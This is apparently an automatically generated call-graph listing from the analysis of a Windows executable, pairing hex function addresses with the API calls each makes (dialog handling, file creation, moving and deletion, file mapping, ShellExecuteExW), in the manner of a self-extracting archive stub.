SendMessageW 24566->24570 24567 84bf2a SendMessageW 24567->24566 24568->24565 24571 84b96b 24568->24571 24569->24570 24805 84a64d GetCurrentDirectoryW 24570->24805 24577 84b980 GetDlgItem 24571->24577 24720 84b974 24571->24720 24573 83e617 53 API calls 24572->24573 24580 84b8ce SetDlgItemTextW 24573->24580 24581 84b85b 24574->24581 24576->24637 24578 84b994 SendMessageW SendMessageW 24577->24578 24579 84b9b7 SetFocus 24577->24579 24578->24579 24583 84b9c7 24579->24583 24597 84b9e0 24579->24597 24584 84b8d9 24580->24584 24827 83124f SHGetMalloc 24581->24827 24582 84bf82 GetDlgItem 24586 84bfa5 SetWindowTextW 24582->24586 24587 84bf9f 24582->24587 24588 83e617 53 API calls 24583->24588 24591 84b8e6 GetMessageW 24584->24591 24584->24637 24806 84abab GetClassNameW 24586->24806 24587->24586 24592 84b9d1 24588->24592 24589 84be55 24593 83e617 53 API calls 24589->24593 24595 84b8fd IsDialogMessageW 24591->24595 24591->24637 24828 84d4d4 24592->24828 24599 84be65 SetDlgItemTextW 24593->24599 24595->24584 24601 84b90c TranslateMessage DispatchMessageW 24595->24601 24604 83e617 53 API calls 24597->24604 24598 84c1fc SetDlgItemTextW 24598->24637 24602 84be79 24599->24602 24601->24584 24605 83e617 53 API calls 24602->24605 24607 84ba17 24604->24607 24641 84be9c _wcslen 24605->24641 24606 84bff0 24610 84c020 24606->24610 24613 83e617 53 API calls 24606->24613 24612 834092 _swprintf 51 API calls 24607->24612 24608 84c73f 97 API calls 24608->24606 24609 84b9d9 24732 83a0b1 24609->24732 24621 84c73f 97 API calls 24610->24621 24646 84c0d8 24610->24646 24615 84ba29 24612->24615 24618 84c003 SetDlgItemTextW 24613->24618 24617 84d4d4 16 API calls 24615->24617 24616 84c18b 24622 84c194 EnableWindow 24616->24622 24623 84c19d 24616->24623 24617->24609 24624 83e617 53 API calls 24618->24624 24619 84ba68 GetLastError 24620 84ba73 24619->24620 24738 84ac04 SetCurrentDirectoryW 24620->24738 24626 84c03b 24621->24626 24622->24623 24627 84c1ba 24623->24627 24846 8312d3 GetDlgItem EnableWindow 24623->24846 24628 84c017 SetDlgItemTextW 24624->24628 24631 84c072 24626->24631 24638 84c04d 24626->24638 24634 84c1e1 24627->24634 24650 84c1d9 SendMessageW 24627->24650 24628->24610 24629 84ba87 24635 84ba90 GetLastError 24629->24635 24636 84ba9e 24629->24636 24630 83e617 53 API calls 24630->24637 24632 84c0cb 24631->24632 24672 84c73f 97 API calls 24631->24672 24642 84c73f 97 API calls 24632->24642 24634->24637 24643 83e617 53 API calls 24634->24643 24635->24636 24644 84baae GetTickCount 24636->24644 24645 84bb20 24636->24645 24696 84bb11 24636->24696 24844 849ed5 32 API calls 24638->24844 24640 84c1b0 24847 8312d3 GetDlgItem EnableWindow 24640->24847 24647 83e617 53 API calls 24641->24647 24668 84beed 24641->24668 24642->24646 24651 84b862 24643->24651 24652 834092 _swprintf 51 API calls 24644->24652 24655 84bcfb 24645->24655 24656 84bcf1 24645->24656 24657 84bb39 GetModuleFileNameW 24645->24657 24646->24616 24654 84c169 24646->24654 24667 83e617 53 API calls 24646->24667 24653 84bed0 24647->24653 24648 84bd56 24747 8312f1 GetDlgItem ShowWindow 24648->24747 24650->24634 24651->24598 24651->24637 24666 84bac7 24652->24666 24660 834092 _swprintf 51 API calls 24653->24660 24845 849ed5 32 API calls 24654->24845 24664 83e617 53 API calls 24655->24664 24656->24565 24656->24655 24838 83f28c 82 API calls 24657->24838 24659 84bd66 24748 8312f1 GetDlgItem ShowWindow 24659->24748 24660->24668 24663 84c066 24663->24631 24671 84bd05 24664->24671 24739 83966e 24666->24739 24667->24646 24668->24630 24669 84c188 24669->24616 24670 84bb5f 24674 834092 _swprintf 51 API calls 24670->24674 24675 834092 _swprintf 51 API calls 24671->24675 24676 84c0a0 24672->24676 24673 84bd70 24677 83e617 53 API calls 24673->24677 24679 84bb81 CreateFileMappingW 24674->24679 24680 84bd23 24675->24680 24676->24632 24681 84c0a9 DialogBoxParamW 24676->24681 24682 84bd7a SetDlgItemTextW 24677->24682 24684 84bbe3 GetCommandLineW 24679->24684 24714 84bc60 __InternalCxxFrameHandler 24679->24714 24693 83e617 53 API calls 24680->24693 24681->24565 24681->24632 24749 8312f1 GetDlgItem ShowWindow 24682->24749 24683 84baed 24687 84baf4 GetLastError 24683->24687 24688 84baff 24683->24688 24689 84bbf4 24684->24689 24685 84bc6b ShellExecuteExW 24712 84bc88 24685->24712 24687->24688 24691 83959a 80 API calls 24688->24691 24839 84b425 SHGetMalloc 24689->24839 24690 84bd8c SetDlgItemTextW GetDlgItem 24694 84bdc1 24690->24694 24695 84bda9 GetWindowLongW SetWindowLongW 24690->24695 24691->24696 24698 84bd3d 24693->24698 24750 84c73f 24694->24750 24695->24694 24696->24645 24696->24648 24697 84bc10 24840 84b425 SHGetMalloc 24697->24840 24702 84bc1c 24841 84b425 SHGetMalloc 24702->24841 24703 84bccb 24703->24656 24709 84bce1 UnmapViewOfFile CloseHandle 24703->24709 24704 84c73f 97 API calls 24706 84bddd 24704->24706 24775 84da52 24706->24775 24707 84bc28 24842 83f3fa 82 API calls 2 library calls 24707->24842 24709->24656 24711 84bc3f MapViewOfFile 24711->24714 24712->24703 24715 84bcb7 Sleep 24712->24715 24714->24685 24715->24703 24715->24712 24716 84c73f 97 API calls 24719 84be03 24716->24719 24717 84be2c 24843 8312d3 GetDlgItem EnableWindow 24717->24843 24719->24717 24721 84c73f 97 API calls 24719->24721 24720->24565 24720->24589 24721->24717 24723 831378 24722->24723 24724 83131f 24722->24724 24849 83e2c1 GetWindowLongW SetWindowLongW 24723->24849 24726 831385 24724->24726 24848 83e2e8 62 API calls 2 library calls 24724->24848 24726->24558 24726->24559 24726->24637 24728 831341 24728->24726 24729 831354 GetDlgItem 24728->24729 24729->24726 24730 831364 24729->24730 24730->24726 24731 83136a SetWindowTextW 24730->24731 24731->24726 24735 83a0bb 24732->24735 24733 83a14c 24734 83a2b2 8 API calls 24733->24734 24736 83a175 24733->24736 24734->24736 24735->24733 24735->24736 24850 83a2b2 24735->24850 24736->24619 24736->24620 24738->24629 24740 839678 24739->24740 24741 8396d5 CreateFileW 24740->24741 24742 8396c9 24740->24742 24741->24742 24743 83971f 24742->24743 24744 83bb03 GetCurrentDirectoryW 24742->24744 24743->24683 24745 839704 24744->24745 24745->24743 24746 839708 CreateFileW 24745->24746 24746->24743 24747->24659 24748->24673 24749->24690 24751 84c749 __EH_prolog 24750->24751 24752 84bdcf 24751->24752 24753 84b314 ExpandEnvironmentStringsW 24751->24753 24752->24704 24762 84c780 _wcslen _wcsrchr 24753->24762 24755 84b314 ExpandEnvironmentStringsW 24755->24762 24756 84ca67 SetWindowTextW 24756->24762 24759 853e3e 22 API calls 24759->24762 24761 84c855 SetFileAttributesW 24763 84c90f GetFileAttributesW 24761->24763 24764 84c86f __cftof _wcslen 24761->24764 24762->24752 24762->24755 24762->24756 24762->24759 24762->24761 24768 84cc31 GetDlgItem SetWindowTextW SendMessageW 24762->24768 24770 84cc71 SendMessageW 24762->24770 24871 841fbb CompareStringW 24762->24871 24872 84a64d GetCurrentDirectoryW 24762->24872 24874 83a5d1 6 API calls 24762->24874 24875 83a55a FindClose 24762->24875 24876 84b48e 76 API calls 2 library calls 24762->24876 24763->24762 24766 84c921 DeleteFileW 24763->24766 24764->24762 24764->24763 24873 83b991 51 API calls 2 library calls 24764->24873 24766->24762 24772 84c932 24766->24772 24768->24762 24769 834092 _swprintf 51 API calls 24771 84c952 GetFileAttributesW 24769->24771 24770->24762 24771->24772 24773 84c967 MoveFileW 24771->24773 24772->24769 24773->24762 24774 84c97f MoveFileExW 24773->24774 24774->24762 24776 84da5c __EH_prolog 24775->24776 24877 840659 24776->24877 24778 84da8d 24881 835b3d 24778->24881 24780 84daab 24885 837b0d 24780->24885 24784 84dafe 24901 837b9e 24784->24901 24786 84bdee 24786->24716 24788 84d6a8 24787->24788 24789 84a5c6 4 API calls 24788->24789 24790 84d6ad 24789->24790 24791 84d6b5 GetWindow 24790->24791 24792 84bf15 24790->24792 24791->24792 24795 84d6d5 24791->24795 24792->24566 24792->24567 24793 84d6e2 GetClassNameW 25349 841fbb CompareStringW 24793->25349 24795->24792 24795->24793 24796 84d706 GetWindowLongW 24795->24796 24797 84d76a GetWindow 24795->24797 24796->24797 24798 84d716 SendMessageW 24796->24798 24797->24792 24797->24795 24798->24797 24799 84d72c GetObjectW 24798->24799 25350 84a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24799->25350 24801 84d743 25351 84a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24801->25351 25352 84a80c 8 API calls 24801->25352 24804 84d754 SendMessageW DeleteObject 24804->24797 24805->24582 24807 84abf1 24806->24807 24808 84abcc 24806->24808 24810 84abf6 SHAutoComplete 24807->24810 24811 84abff 24807->24811 25353 841fbb CompareStringW 24808->25353 24810->24811 24814 84b093 24811->24814 24812 84abdf 24812->24807 24813 84abe3 FindWindowExW 24812->24813 24813->24807 24815 84b09d __EH_prolog 24814->24815 24816 8313dc 84 API calls 24815->24816 24817 84b0bf 24816->24817 25354 831fdc 24817->25354 24820 84b0d9 24822 831692 86 API calls 24820->24822 24821 84b0eb 24823 8319af 128 API calls 24821->24823 24824 84b0e4 24822->24824 24826 84b10d __InternalCxxFrameHandler ___std_exception_copy 24823->24826 24824->24606 24824->24608 24825 831692 86 API calls 24825->24824 24826->24825 24827->24651 24829 84b568 5 API calls 24828->24829 24830 84d4e0 GetDlgItem 24829->24830 24831 84d536 SendMessageW SendMessageW 24830->24831 24832 84d502 24830->24832 24833 84d591 SendMessageW SendMessageW SendMessageW 24831->24833 24834 84d572 24831->24834 24835 84d50d ShowWindow SendMessageW SendMessageW 24832->24835 24836 84d5c4 SendMessageW 24833->24836 24837 84d5e7 SendMessageW 24833->24837 24834->24833 24835->24831 24836->24837 24837->24609 24838->24670 24839->24697 24840->24702 24841->24707 24842->24711 24843->24720 24844->24663 24845->24669 24846->24640 24847->24627 24848->24728 24849->24726 24851 83a2bf 24850->24851 24852 83a2e3 24851->24852 24853 83a2d6 CreateDirectoryW 24851->24853 24854 83a231 3 API calls 24852->24854 24853->24852 24855 83a316 24853->24855 24856 83a2e9 24854->24856 24857 83a325 24855->24857 24863 83a4ed 24855->24863 24858 83a329 GetLastError 24856->24858 24860 83bb03 GetCurrentDirectoryW 24856->24860 24857->24735 24858->24857 24861 83a2ff 24860->24861 24861->24858 24862 83a303 CreateDirectoryW 24861->24862 24862->24855 24862->24858 24864 84ec50 24863->24864 24865 83a4fa SetFileAttributesW 24864->24865 24866 83a510 24865->24866 24867 83a53d 24865->24867 24868 83bb03 GetCurrentDirectoryW 24866->24868 24867->24857 24869 83a524 24868->24869 24869->24867 24870 83a528 SetFileAttributesW 24869->24870 24870->24867 24871->24762 24872->24762 24873->24764 24874->24762 24875->24762 24876->24762 24878 840666 _wcslen 24877->24878 24905 8317e9 24878->24905 24880 84067e 24880->24778 24882 840659 _wcslen 24881->24882 24883 8317e9 78 API calls 24882->24883 24884 84067e 24883->24884 24884->24780 24886 837b17 __EH_prolog 24885->24886 24922 83ce40 24886->24922 24888 837b32 24889 84eb38 8 API calls 24888->24889 24891 837b5c 24889->24891 24928 844a76 24891->24928 24893 837c7d 24894 837c87 24893->24894 24896 837cf1 24894->24896 24957 83a56d 24894->24957 24897 837d50 24896->24897 24935 838284 24896->24935 24900 837d92 24897->24900 24963 83138b 74 API calls 24897->24963 24900->24784 24902 837bac 24901->24902 24904 837bb3 24901->24904 24903 842297 86 API calls 24902->24903 24903->24904 24906 8317ff 24905->24906 24917 83185a __InternalCxxFrameHandler 24905->24917 24907 831828 24906->24907 24918 836c36 76 API calls __vswprintf_c_l 24906->24918 24909 831887 24907->24909 24910 831847 ___std_exception_copy 24907->24910 24912 853e3e 22 API calls 24909->24912 24910->24917 24920 836ca7 75 API calls 24910->24920 24911 83181e 24919 836ca7 75 API calls 24911->24919 24914 83188e 24912->24914 24914->24917 24921 836ca7 75 API calls 24914->24921 24917->24880 24918->24911 24919->24907 24920->24917 24921->24917 24923 83ce4a __EH_prolog 24922->24923 24924 84eb38 8 API calls 24923->24924 24926 83ce8d 24924->24926 24925 84eb38 8 API calls 24927 83ceb1 24925->24927 24926->24925 24927->24888 24929 844a80 __EH_prolog 24928->24929 24930 84eb38 8 API calls 24929->24930 24931 844a9c 24930->24931 24932 837b8b 24931->24932 24934 840e46 80 API calls 24931->24934 24932->24893 24934->24932 24936 83828e __EH_prolog 24935->24936 24964 8313dc 24936->24964 24938 8382aa 24939 8382bb 24938->24939 25104 839f42 24938->25104 24942 8382f2 24939->24942 24972 831a04 24939->24972 25100 831692 24942->25100 24945 838389 24991 838430 24945->24991 24948 8383e8 24996 831f6d 24948->24996 24952 8382ee 24952->24942 24952->24945 24955 83a56d 7 API calls 24952->24955 25108 83c0c5 CompareStringW _wcslen 24952->25108 24953 8383f3 24953->24942 25000 833b2d 24953->25000 25012 83848e 24953->25012 24955->24952 24958 83a582 24957->24958 24959 83a5b0 24958->24959 25338 83a69b 24958->25338 24959->24894 24961 83a592 24961->24959 24962 83a597 FindClose 24961->24962 24962->24959 24963->24900 24965 8313e1 __EH_prolog 24964->24965 24966 83ce40 8 API calls 24965->24966 24967 831419 24966->24967 24968 84eb38 8 API calls 24967->24968 24971 831474 __cftof 24967->24971 24969 831461 24968->24969 24970 83b505 84 API calls 24969->24970 24969->24971 24970->24971 24971->24938 24973 831a0e __EH_prolog 24972->24973 24985 831a61 24973->24985 24988 831b9b 24973->24988 25110 8313ba 24973->25110 24976 831bc7 25113 83138b 74 API calls 24976->25113 24978 833b2d 101 API calls 24981 831c12 24978->24981 24979 831bd4 24979->24978 24979->24988 24980 831c5a 24984 831c8d 24980->24984 24980->24988 25114 83138b 74 API calls 24980->25114 24981->24980 24983 833b2d 101 API calls 24981->24983 24983->24981 24984->24988 24989 839e80 79 API calls 24984->24989 24985->24976 24985->24979 24985->24988 24986 833b2d 101 API calls 24987 831cde 24986->24987 24987->24986 24987->24988 24988->24952 24989->24987 24990 839e80 79 API calls 24990->24985 25132 83cf3d 24991->25132 24993 838440 25136 8413d2 GetSystemTime SystemTimeToFileTime 24993->25136 24995 8383a3 24995->24948 25109 841b66 72 API calls 24995->25109 24997 831f72 __EH_prolog 24996->24997 24999 831fa6 24997->24999 25141 8319af 24997->25141 24999->24953 25001 833b39 25000->25001 25002 833b3d 25000->25002 25001->24953 25011 839e80 79 API calls 25002->25011 25003 833b4f 25004 833b6a 25003->25004 25005 833b78 25003->25005 25006 833baa 25004->25006 25271 8332f7 89 API calls 2 library calls 25004->25271 25272 83286b 101 API calls 3 library calls 25005->25272 25006->24953 25009 833b76 25009->25006 25273 8320d7 74 API calls 25009->25273 25011->25003 25013 838498 __EH_prolog 25012->25013 25018 8384d5 25013->25018 25027 838513 25013->25027 25298 848c8d 103 API calls 25013->25298 25014 8384f5 25016 8384fa 25014->25016 25017 83851c 25014->25017 25016->25027 25299 837a0d 152 API calls 25016->25299 25017->25027 25300 848c8d 103 API calls 25017->25300 25018->25014 25020 83857a 25018->25020 25018->25027 25020->25027 25274 835d1a 25020->25274 25023 838605 25023->25027 25280 838167 25023->25280 25026 838797 25028 83a56d 7 API calls 25026->25028 25029 838802 25026->25029 25027->24953 25028->25029 25286 837c0d 25029->25286 25031 83d051 82 API calls 25037 83885d 25031->25037 25032 83898b 25303 832021 74 API calls 25032->25303 25033 838a5f 25038 838ab6 25033->25038 25050 838a6a 25033->25050 25034 838992 25034->25033 25040 8389e1 25034->25040 25037->25027 25037->25031 25037->25032 25037->25034 25301 838117 84 API calls 25037->25301 25302 832021 74 API calls 25037->25302 25045 838a4c 25038->25045 25306 837fc0 97 API calls 25038->25306 25039 838b14 25046 838b82 25039->25046 25089 839105 25039->25089 25307 8398bc 25039->25307 25040->25039 25044 83a231 3 API calls 25040->25044 25040->25045 25042 83959a 80 API calls 25042->25027 25043 83959a 80 API calls 25043->25027 25047 838a19 25044->25047 25045->25039 25057 838ab4 25045->25057 25048 83ab1a 8 API calls 25046->25048 25047->25045 25304 8392a3 97 API calls 25047->25304 25051 838bd1 25048->25051 25050->25057 25305 837db2 101 API calls 25050->25305 25053 83ab1a 8 API calls 25051->25053 25072 838be7 25053->25072 25057->25043 25058 838b70 25311 836e98 77 API calls 25058->25311 25060 838e40 25065 838e52 25060->25065 25066 838e66 25060->25066 25085 838d49 25060->25085 25061 838d18 25063 838d8a 25061->25063 25064 838d28 25061->25064 25062 838cbc 25062->25060 25062->25061 25070 838167 19 API calls 25063->25070 25067 838d6e 25064->25067 25075 838d37 25064->25075 25068 839215 123 API calls 25065->25068 25069 843377 75 API calls 25066->25069 25067->25085 25314 8377b8 111 API calls 25067->25314 25068->25085 25071 838e7f 25069->25071 25076 838dbd 25070->25076 25317 843020 123 API calls 25071->25317 25072->25062 25073 838c93 25072->25073 25079 83981a 79 API calls 25072->25079 25073->25062 25312 839a3c 82 API calls 25073->25312 25313 832021 74 API calls 25075->25313 25081 838de6 25076->25081 25082 838df5 25076->25082 25076->25085 25079->25073 25315 837542 85 API calls 25081->25315 25316 839155 93 API calls __EH_prolog 25082->25316 25088 838f85 25085->25088 25318 832021 74 API calls 25085->25318 25087 839090 25087->25089 25091 83a4ed 3 API calls 25087->25091 25088->25087 25088->25089 25090 83903e 25088->25090 25292 839f09 SetEndOfFile 25088->25292 25089->25042 25293 839da2 25090->25293 25092 8390eb 25091->25092 25092->25089 25319 832021 74 API calls 25092->25319 25095 839085 25097 839620 77 API calls 25095->25097 25097->25087 25098 8390fb 25320 836dcb 76 API calls 25098->25320 25101 8316a4 25100->25101 25336 83cee1 86 API calls 25101->25336 25105 839f59 25104->25105 25106 839f63 25105->25106 25337 836d0c 78 API calls 25105->25337 25106->24939 25108->24952 25109->24948 25115 831732 25110->25115 25112 8313d6 25112->24990 25113->24988 25114->24984 25116 831748 25115->25116 25126 8317a0 __InternalCxxFrameHandler 25115->25126 25117 831771 25116->25117 25128 836c36 76 API calls __vswprintf_c_l 25116->25128 25119 8317c7 25117->25119 25124 83178d ___std_exception_copy 25117->25124 25121 853e3e 22 API calls 25119->25121 25120 831767 25129 836ca7 75 API calls 25120->25129 25123 8317ce 25121->25123 25123->25126 25131 836ca7 75 API calls 25123->25131 25124->25126 25130 836ca7 75 API calls 25124->25130 25126->25112 25128->25120 25129->25117 25130->25126 25131->25126 25133 83cf4d 25132->25133 25135 83cf54 25132->25135 25137 83981a 25133->25137 25135->24993 25136->24995 25138 839833 25137->25138 25140 839e80 79 API calls 25138->25140 25139 839865 25139->25135 25140->25139 25142 8319bf 25141->25142 25144 8319bb 25141->25144 25145 8318f6 25142->25145 25144->24999 25146 831908 25145->25146 25147 831945 25145->25147 25148 833b2d 101 API calls 25146->25148 25153 833fa3 25147->25153 25150 831928 25148->25150 25150->25144 25155 833fac 25153->25155 25154 833b2d 101 API calls 25154->25155 25155->25154 25157 831966 25155->25157 25170 840e08 25155->25170 25157->25150 25158 831e50 25157->25158 25159 831e5a __EH_prolog 25158->25159 25178 833bba 25159->25178 25161 831e84 25162 831732 78 API calls 25161->25162 25165 831f0b 25161->25165 25163 831e9b 25162->25163 25206 8318a9 78 API calls 25163->25206 25165->25150 25166 831eb3 25168 831ebf _wcslen 25166->25168 25207 841b84 MultiByteToWideChar 25166->25207 25208 8318a9 78 API calls 25168->25208 25171 840e0f 25170->25171 25172 840e2a 25171->25172 25176 836c31 RaiseException CallUnexpected 25171->25176 25174 840e3b SetThreadExecutionState 25172->25174 25177 836c31 RaiseException CallUnexpected 25172->25177 25174->25155 25176->25172 25177->25174 25179 833bc4 __EH_prolog 25178->25179 25180 833bf6 25179->25180 25181 833bda 25179->25181 25182 833e51 25180->25182 25186 833c22 25180->25186 25234 83138b 74 API calls 25181->25234 25251 83138b 74 API calls 25182->25251 25185 833be5 25185->25161 25186->25185 25209 843377 25186->25209 25188 833ca3 25189 833d2e 25188->25189 25205 833c9a 25188->25205 25237 83d051 25188->25237 25219 83ab1a 25189->25219 25190 833c9f 25190->25188 25236 8320bd 78 API calls 25190->25236 25192 833c71 25192->25188 25192->25190 25193 833c8f 25192->25193 25235 83138b 74 API calls 25193->25235 25198 833d41 25199 833dd7 25198->25199 25200 833dc7 25198->25200 25243 843020 123 API calls 25199->25243 25223 839215 25200->25223 25203 833dd5 25203->25205 25244 832021 74 API calls 25203->25244 25245 842297 25205->25245 25206->25166 25207->25168 25208->25165 25210 84338c 25209->25210 25213 843396 ___std_exception_copy 25209->25213 25252 836ca7 75 API calls 25210->25252 25212 8434c6 25254 85238d RaiseException 25212->25254 25213->25212 25214 84341c 25213->25214 25218 843440 __cftof 25213->25218 25253 8432aa 75 API calls 3 library calls 25214->25253 25217 8434f2 25218->25192 25220 83ab32 25219->25220 25221 83ab28 25219->25221 25220->25198 25222 84eb38 8 API calls 25221->25222 25222->25220 25224 83921f __EH_prolog 25223->25224 25255 837c64 25224->25255 25227 8313ba 78 API calls 25228 839231 25227->25228 25258 83d114 25228->25258 25230 839243 25232 83d114 118 API calls 25230->25232 25233 83928a 25230->25233 25267 83d300 97 API calls __InternalCxxFrameHandler 25230->25267 25232->25230 25233->25203 25234->25185 25235->25205 25236->25188 25238 83d072 25237->25238 25239 83d084 25237->25239 25268 83603a 82 API calls 25238->25268 25269 83603a 82 API calls 25239->25269 25242 83d07c 25242->25189 25243->25203 25244->25205 25247 8422a1 25245->25247 25246 8422ba 25270 840eed 86 API calls 25246->25270 25247->25246 25250 8422ce 25247->25250 25249 8422c1 25249->25250 25251->25185 25252->25213 25253->25218 25254->25217 25256 83b146 GetVersionExW 25255->25256 25257 837c69 25256->25257 25257->25227 25264 83d12a __InternalCxxFrameHandler 25258->25264 25259 83d29a 25260 83d2ce 25259->25260 25261 83d0cb 6 API calls 25259->25261 25262 840e08 SetThreadExecutionState RaiseException 25260->25262 25261->25260 25265 83d291 25262->25265 25263 848c8d 103 API calls 25263->25264 25264->25259 25264->25263 25264->25265 25266 83ac05 91 API calls 25264->25266 25265->25230 25266->25264 25267->25230 25268->25242 25269->25242 25270->25249 25271->25009 25272->25009 25273->25006 25275 835d2a 25274->25275 25321 835c4b 25275->25321 25278 835d5d 25279 835d95 25278->25279 25326 83b1dc CharUpperW CompareStringW _wcslen ___vcrt_InitializeCriticalSectionEx 25278->25326 25279->25023 25281 838186 25280->25281 25282 838232 25281->25282 25333 83be5e 19 API calls __InternalCxxFrameHandler 25281->25333 25332 841fac CharUpperW 25282->25332 25285 83823b 25285->25026 25287 837c22 25286->25287 25288 837c5a 25287->25288 25334 836e7a 74 API calls 25287->25334 25288->25037 25290 837c52 25335 83138b 74 API calls 25290->25335 25292->25090 25294 839db3 25293->25294 25297 839dc2 25293->25297 25295 839db9 FlushFileBuffers 25294->25295 25294->25297 25295->25297 25296 839e3f SetFileTime 25296->25095 25297->25296 25298->25018 25299->25027 25300->25027 25301->25037 25302->25037 25303->25034 25304->25045 25305->25057 25306->25045 25308 838b5a 25307->25308 25309 8398c5 GetFileType 25307->25309 25308->25046 25310 832021 74 API calls 25308->25310 25309->25308 25310->25058 25311->25046 25312->25062 25313->25085 25314->25085 25315->25085 25316->25085 25317->25085 25318->25088 25319->25098 25320->25089 25327 835b48 25321->25327 25324 835c6c 25324->25278 25325 835b48 2 API calls 25325->25324 25326->25278 25328 835b52 25327->25328 25330 835c3a 25328->25330 25331 83b1dc CharUpperW CompareStringW _wcslen ___vcrt_InitializeCriticalSectionEx 25328->25331 25330->25324 25330->25325 25331->25328 25332->25285 25333->25282 25334->25290 25335->25288 25337->25106 25339 83a6a8 25338->25339 25340 83a6c1 FindFirstFileW 25339->25340 25341 83a727 FindNextFileW 25339->25341 25343 83a6d0 25340->25343 25348 83a709 25340->25348 25342 83a732 GetLastError 25341->25342 25341->25348 25342->25348 25344 83bb03 GetCurrentDirectoryW 25343->25344 25345 83a6e0 25344->25345 25346 83a6e4 FindFirstFileW 25345->25346 25347 83a6fe GetLastError 25345->25347 25346->25347 25346->25348 25347->25348 25348->24961 25349->24795 25350->24801 25351->24801 25352->24804 25353->24812 25355 839f42 78 API calls 25354->25355 25356 831fe8 25355->25356 25357 831a04 101 API calls 25356->25357 25360 832005 25356->25360 25358 831ff5 25357->25358 25358->25360 25361 83138b 74 API calls 25358->25361 25360->24820 25360->24821 25361->25360 25432 8494e0 GetClientRect 25433 84f2e0 46 API calls __RTC_Initialize 25485 8421e0 26 API calls std::bad_exception::bad_exception 25434 85bee0 GetCommandLineA GetCommandLineW 25486 83f1e8 FreeLibrary 25435 835ef0 82 API calls 25488 8395f0 80 API calls 25369 8598f0 25377 85adaf 25369->25377 25373 85990c 25374 859919 25373->25374 25385 859920 11 API calls 25373->25385 25376 859904 25378 85ac98 _abort 5 API calls 25377->25378 25379 85add6 25378->25379 25380 85adee TlsAlloc 25379->25380 25381 85addf 25379->25381 25380->25381 25382 84fbbc CatchGuardHandler 5 API calls 25381->25382 25383 8598fa 25382->25383 25383->25376 25384 859869 20 API calls 2 library calls 25383->25384 25384->25373 25385->25376 25386 85abf0 25387 85abfb 25386->25387 25388 85af0a 11 API calls 25387->25388 25389 85ac24 25387->25389 25390 85ac20 25387->25390 25388->25387 25392 85ac50 DeleteCriticalSection 25389->25392 25392->25390 25436 8588f0 7 API calls ___scrt_uninitialize_crt 25490 84fd4f 9 API calls 2 library calls 25438 852cfb 38 API calls 4 library calls 25439 84a400 GdipDisposeImage GdipFree 25440 84d600 70 API calls 25441 856000 QueryPerformanceFrequency QueryPerformanceCounter 25443 85f200 51 API calls 25492 852900 6 API calls 4 library calls 25494 85a700 21 API calls 25496 831710 86 API calls 25497 84ad10 73 API calls 25446 85f421 21 API calls __vsnwprintf_l 25447 84c220 93 API calls _swprintf 25449 831025 29 API calls 25500 84f530 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 25501 84ff30 LocalFree 23576 85bb30 23577 85bb39 23576->23577 23579 85bb42 23576->23579 23580 85ba27 23577->23580 23600 8597e5 GetLastError 23580->23600 23582 85ba34 23620 85bb4e 23582->23620 23584 85ba3c 23629 85b7bb 23584->23629 23587 85ba53 23587->23579 23590 85ba96 23654 858dcc 23590->23654 23594 85ba91 23653 8591a8 20 API calls _abort 23594->23653 23596 85bada 23596->23590 23660 85b691 26 API calls 23596->23660 23597 85baae 23597->23596 23598 858dcc _free 20 API calls 23597->23598 23598->23596 23601 8597fb 23600->23601 23605 859801 23600->23605 23661 85ae5b 11 API calls 2 library calls 23601->23661 23607 859850 SetLastError 23605->23607 23662 85b136 23605->23662 23606 85981b 23609 858dcc _free 20 API calls 23606->23609 23607->23582 23611 859821 23609->23611 23610 859830 23610->23606 23612 859837 23610->23612 23613 85985c SetLastError 23611->23613 23670 859649 20 API calls _abort 23612->23670 23671 858d24 38 API calls _abort 23613->23671 23616 859842 23618 858dcc _free 20 API calls 23616->23618 23619 859849 23618->23619 23619->23607 23619->23613 23621 85bb5a ___scrt_is_nonwritable_in_current_image 23620->23621 23622 8597e5 _unexpected 38 API calls 23621->23622 23624 85bb64 23622->23624 23627 85bbe8 _abort 23624->23627 23628 858dcc _free 20 API calls 23624->23628 23674 858d24 38 API calls _abort 23624->23674 23675 85ac31 EnterCriticalSection 23624->23675 23676 85bbdf LeaveCriticalSection _abort 23624->23676 23627->23584 23628->23624 23677 854636 23629->23677 23632 85b7dc GetOEMCP 23635 85b805 23632->23635 23633 85b7ee 23634 85b7f3 GetACP 23633->23634 23633->23635 23634->23635 23635->23587 23636 858e06 23635->23636 23637 858e44 23636->23637 23642 858e14 _abort 23636->23642 23688 8591a8 20 API calls _abort 23637->23688 23639 858e2f RtlAllocateHeap 23640 858e42 23639->23640 23639->23642 23640->23590 23643 85bbf0 23640->23643 23642->23637 23642->23639 23687 857a5e 7 API calls 2 library calls 23642->23687 23644 85b7bb 40 API calls 23643->23644 23645 85bc0f 23644->23645 23648 85bc60 IsValidCodePage 23645->23648 23650 85bc16 23645->23650 23652 85bc85 __cftof 23645->23652 23647 85ba89 23647->23594 23647->23597 23649 85bc72 GetCPInfo 23648->23649 23648->23650 23649->23650 23649->23652 23699 84fbbc 23650->23699 23689 85b893 GetCPInfo 23652->23689 23653->23590 23655 858e00 _free 23654->23655 23656 858dd7 RtlFreeHeap 23654->23656 23655->23587 23656->23655 23657 858dec 23656->23657 23780 8591a8 20 API calls _abort 23657->23780 23659 858df2 GetLastError 23659->23655 23660->23590 23661->23605 23667 85b143 _abort 23662->23667 23663 85b183 23673 8591a8 20 API calls _abort 23663->23673 23664 85b16e RtlAllocateHeap 23666 859813 23664->23666 23664->23667 23666->23606 23669 85aeb1 11 API calls 2 library calls 23666->23669 23667->23663 23667->23664 23672 857a5e 7 API calls 2 library calls 23667->23672 23669->23610 23670->23616 23672->23667 23673->23666 23675->23624 23676->23624 23678 854653 23677->23678 23679 854649 23677->23679 23678->23679 23680 8597e5 _unexpected 38 API calls 23678->23680 23679->23632 23679->23633 23681 854674 23680->23681 23685 85993a 38 API calls __cftof 23681->23685 23683 85468d 23686 859967 38 API calls __cftof 23683->23686 23685->23683 23686->23679 23687->23642 23688->23640 23690 85b977 23689->23690 23695 85b8cd 23689->23695 23692 84fbbc CatchGuardHandler 5 API calls 23690->23692 23694 85ba23 23692->23694 23694->23650 23706 85c988 23695->23706 23698 85ab78 __vsnwprintf_l 43 API calls 23698->23690 23700 84fbc4 23699->23700 23701 84fbc5 IsProcessorFeaturePresent 23699->23701 23700->23647 23703 84fc07 23701->23703 23779 84fbca SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 